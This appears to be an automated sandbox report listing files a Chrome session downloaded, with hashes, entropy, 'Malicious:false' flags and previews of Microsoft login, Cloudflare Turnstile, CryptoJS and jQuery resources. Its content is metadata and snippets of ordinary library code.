                                                          Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 79 x 90, 8-bit/color RGB, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):61
                                                          Entropy (8bit):4.068159130770306
                                                          Encrypted:false
                                                          SSDEEP:3:yionv//thPl6ltnl4Bhkxl/k4E08up:6v/lhPWGXk7Tp
                                                          MD5:039F4DFE876EFFABF8D1D75BFAA86E6A
                                                          SHA1:E86EDFAA485021EC66FD374D5503E026C73863CB
                                                          SHA-256:B0C0A20B54136213114E128F55345A3C23A00C8892F996370C47E3214ADC4966
                                                          SHA-512:12CFEEBE819A89B986869BD7F397C0A62C8D057614A25FCACC41FB9CEB39B4C0A91A37403DF8727455BB75A22F4D491A1A579EFC291CA8534D7C78B0217D3BD0
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8ff714c8fb27c325/1736453537880/TCoQzFc-1Z86YKl
                                                          Preview:.PNG........IHDR...O...Z.....vM......IDAT.....$.....IEND.B`.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                          Category:dropped
                                                          Size (bytes):116343
                                                          Entropy (8bit):7.997640489040715
                                                          Encrypted:true
                                                          SSDEEP:3072:s8ovOS/D3L+TGsLMet6+iNLTMMqfC4hyFv0As5:jNSrij/t6+aAMqfCoydM5
                                                          MD5:3063B0DA40B45B46602FCE99AC53D315
                                                          SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                          SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                          SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):48316
                                                          Entropy (8bit):5.6346993394709
                                                          Encrypted:false
                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                          Category:downloaded
                                                          Size (bytes):61052
                                                          Entropy (8bit):7.996159932827634
                                                          Encrypted:true
                                                          SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                          MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                          SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                          SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                          SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                          Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                          Category:downloaded
                                                          Size (bytes):3452
                                                          Entropy (8bit):5.117912766689607
                                                          Encrypted:false
                                                          SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                          MD5:CB06E9A552B197D5C0EA600B431A3407
                                                          SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                          SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                          SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://login.live.com/Me.htm?v=3
                                                          Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                          Category:dropped
                                                          Size (bytes):61052
                                                          Entropy (8bit):7.996159932827634
                                                          Encrypted:true
                                                          SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                          MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                          SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                          SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                          SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                          Category:downloaded
                                                          Size (bytes):1435
                                                          Entropy (8bit):7.8613342322590265
                                                          Encrypted:false
                                                          SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                          MD5:9F368BC4580FED907775F31C6B26D6CF
                                                          SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                          SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                          SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                          Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (47520)
                                                          Category:downloaded
                                                          Size (bytes):47521
                                                          Entropy (8bit):5.3981340461317835
                                                          Encrypted:false
                                                          SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                          MD5:7C92EC9D1395055CE0405A32607C7291
                                                          SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                          SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                          SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.js
                                                          Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                          Category:dropped
                                                          Size (bytes):1435
                                                          Entropy (8bit):7.8613342322590265
                                                          Encrypted:false
                                                          SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                          MD5:9F368BC4580FED907775F31C6B26D6CF
                                                          SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                          SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                          SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                          Category:downloaded
                                                          Size (bytes):116343
                                                          Entropy (8bit):7.997640489040715
                                                          Encrypted:true
                                                          SSDEEP:3072:s8ovOS/D3L+TGsLMet6+iNLTMMqfC4hyFv0As5:jNSrij/t6+aAMqfCoydM5
                                                          MD5:3063B0DA40B45B46602FCE99AC53D315
                                                          SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                          SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                          SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_27cef08ca792f8e8b149.js
                                                          Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65447)
                                                          Category:dropped
                                                          Size (bytes):89501
                                                          Entropy (8bit):5.289893677458563
                                                          Encrypted:false
                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                          Category:dropped
                                                          Size (bytes):49911
                                                          Entropy (8bit):7.994516776763163
                                                          Encrypted:true
                                                          SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                          MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                          SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                          SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                          SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                          Category:downloaded
                                                          Size (bytes):3452
                                                          Entropy (8bit):5.117912766689607
                                                          Encrypted:false
                                                          SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                          MD5:CB06E9A552B197D5C0EA600B431A3407
                                                          SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                          SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                          SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://login.live.com/Me.htm?v=3
                                                          Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):72
                                                          Entropy (8bit):4.241202481433726
                                                          Encrypted:false
                                                          SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                          MD5:9E576E34B18E986347909C29AE6A82C6
                                                          SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                          SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                          SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                          Category:downloaded
                                                          Size (bytes):122515
                                                          Entropy (8bit):7.997419459076181
                                                          Encrypted:true
                                                          SSDEEP:3072:1L4xVJNv/cJPu5OEjvuUQIq40zDH227PURbj:1kbGugELatzL7PUlj
                                                          MD5:AC9A6ED508328361A4C9530325A94076
                                                          SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                          SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                          SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_kAx9qZOSH4g90FNHstHMCA2.js
